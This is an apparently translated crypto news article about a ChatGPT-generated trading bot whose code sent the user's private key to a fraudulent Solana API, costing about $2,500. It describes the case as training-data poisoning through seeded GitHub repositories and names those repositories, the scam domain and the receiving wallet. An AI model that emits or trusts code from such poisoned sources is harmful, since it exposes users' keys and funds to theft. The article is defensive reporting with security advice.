Be careful! Internet users have developed a Cryptocurrency Speculation bot using ChatGPT that has been 'backdoored', resulting in the leakage of the Private Key and instant clearing of the Wallet.

robot
Abstract generation in progress

A netizen shared yesterday that he tried to use ChatGPT to develop a cryptocurrency trading bot, but the use of a malicious API by ChatGPT led to the leakage of Private Key. Scam Sniffer pointed out that this is an AI poisoning incident; on-chain security expert Yu Xian also reminded users to carefully review the AI-generated code. (Background: Apple rumored to release an upgraded 'LLM Siri' in 2025: a more powerful AI life assistant than ChatGPT) (Additional information: CZ urgently warns: Mac with Intel chips has major vulnerabilities, update quickly to protect your assets) Generative Artificial Intelligence (AI) has brought us convenience, but we must be cautious about fully trusting the content generated by AI! Yesterday (22), a netizen r_ocky.eth shared his attempt to develop a bot to hype pump.fun's meme coins with ChatGPT, but unexpectedly, ChatGPT embedded a fraudulent API website in the code of this bot. As a result, he lost $2500 in funds. This incident sparked widespread discussion, and cybersecurity founder Yu Xian also expressed his views. Be careful with information from @OpenAI! Today I was trying to write a bump bot for and asked @ChatGPTapp to help me with the code. I got what I asked but I didn't expect that ChatGPT would recommend me a scam @solana API website. I lost around $2.5k. r_ocky.eth (@r_cky0) November 21, 2024 ChatGPT sent the Private Key to a scam website According to r_ocky.eth, the following code snippet is part of the code generated by ChatGPT to help him, which sends his Private Key in the API, as recommended by ChatGPT. However, the API URL solanaapis.com referenced by ChatGPT is a fraudulent website, as shown after searching for that URL. r_ocky.eth stated that after I used this API, scammers quickly took action and within just 30 minutes, transferred all my assets to this Wallet Address: FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX. He said: I vaguely felt that my actions might be problematic, but my trust in @OpenAI made me lose my vigilance. In addition, he admitted that he made the mistake of using the main Wallet Private Key, but he said: 'It's easy to make mistakes when you are in a rush to do many things at once.' Subsequently, @r_cky0 also publicly released the full conversation with ChatGPT at the time for security research to prevent similar incidents from happening again. Yu Xian: Really hacked by AI Regarding the unfortunate encounter of this netizen, on-chain security expert Yu Xian also expressed his opinion, saying: 'This netizen was really hacked by AI.' Unexpectedly, the code provided by GPT had a backdoor that sent the Wallet Private Key to a phishing website. At the same time, Yu Xian also reminded to be cautious when using GPT/Claude and other LLMs, as there are widespread fraudulent activities. Looked into it, this fren's wallet was indeed 'compromised' by AI... Writing a bot with the code given by GPT, unexpectedly the code provided by GPT had a backdoor that sent the private key to a phishing website... When using GPT/Claude and other LLMs, one must be cautious, as these LLMs exhibit widespread deceptive behaviors. Previously mentioned AI poisoning attacks, now this is a real attack case against the Crypto industry. — Cos (Yu Xian) (@evilcos) November 22, 2024 ChatGPT deliberately poisoned Additionally, on-chain anti-fraud platform Scam Sniffer pointed out that this is an AI code poisoning attack incident, where scammers are contaminating AI's training data, implanting malicious Cryptocurrency code, attempting to steal Private Keys. It shared the discovered malicious code repositories: solanaapisdev/moonshot-trading-bot solanaapisdev/pumpfun-api Scam Sniffer stated that GitHub user solanaapisdev created multiple code repositories in the past 4 months, attempting to manipulate AI to generate malicious code, so please be cautious! It recommends: Do not blindly use AI-generated code. Carefully review the code content. Store Private Keys in offline environments. Obtain code only from reliable sources. Yu Xian personally tested Claude's higher security awareness Yu Xian then posed the stolen Private Key code shared by r_ocky.eth (the code with a backdoor given by GPT after being poisoned) as a question 'What are the risks of these codes' to GPT and Claude. The results showed: GPT-4o: did indeed indicate the risk of the Private Key, but rambled on without hitting the key point. Claude-3.5-Sonnet's result pointed directly to the key point: this code segment will send out the Private Key, leading to a leak... This made Yu Xian couldn't help but say: which LLM is more powerful, need not be said. He said: The code generated by LLMs, especially the more complex ones, will generally be cross-reviewed by LLMs, and I will definitely be the final reviewer... For those who are unfamiliar with code, being deceived by AI is quite common. Yu Xian further added that humans are actually scarier, on the internet, in code repositories, distinguishing between true and false is really difficult, based on this AI's learning, being contaminated and poisoned is not surprising. Next, AI will become smarter, understand the need for secure review of each output, and make humans feel more at ease. But still, be cautious, supply chain poisoning is really hard to predict, it always pops up suddenly. Related reports: Binance refutes! Denies 12.8 million customer data leak on Darknet, beware of phishing scams A love letter to decentralization believers: cryptography, ethical responsibility, and the intersection of the crypto punk movement Unveiling》Youtube Cryptocurrency tutorial 'Writing Smart Contracts with ChatGPT', scam victim 10ETH Be careful! Net...

View Original
  • Reward
  • Comment
  • Share
Comment
0/400
No comments